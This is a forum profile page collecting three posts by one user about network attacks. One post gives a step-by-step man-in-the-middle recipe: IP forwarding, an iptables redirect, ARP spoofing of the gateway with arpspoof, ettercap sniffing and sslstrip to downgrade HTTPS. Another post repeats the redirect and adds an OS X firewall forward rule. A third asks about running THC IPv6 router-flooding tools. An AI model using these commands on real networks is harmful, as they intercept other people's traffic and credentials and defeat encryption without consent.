Jump to content

Solace

Active Members
  • Posts

    6
  • Joined

  • Last visited

Posts posted by Solace

  1. Everything should work... try following this exactly...

    sudo echo 1 > /proc/sys/net/ipv4/ip_forward

    uncomment the two lines in your etter.conf file

    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    ifconfig to get your device name, let's pretend it's eth0 as well as the default gateway, we'll pretend it's 192.168.0.1
    sudo arpspoof -i eth0 192.168.0.1
    ettercap -T -q -i eth0
    if you want SSL bypassing
    sslstrip -a -k -f
  2. Hey guys,

    If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X.

    Are there any alternative methods for router flooding from native OS X?

    Thanks

  3. I believe your problem is that you haven't properly updated your firewall restrictions. By default SSLStrip listens on port 10000, assuming you're on linux, try this command

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    if you're on BSD or OS X, try this

    sudo ipfw add fwd 127.0.0.1,12345 tcp from not me to any 443 in via en0

×
×
  • Create New...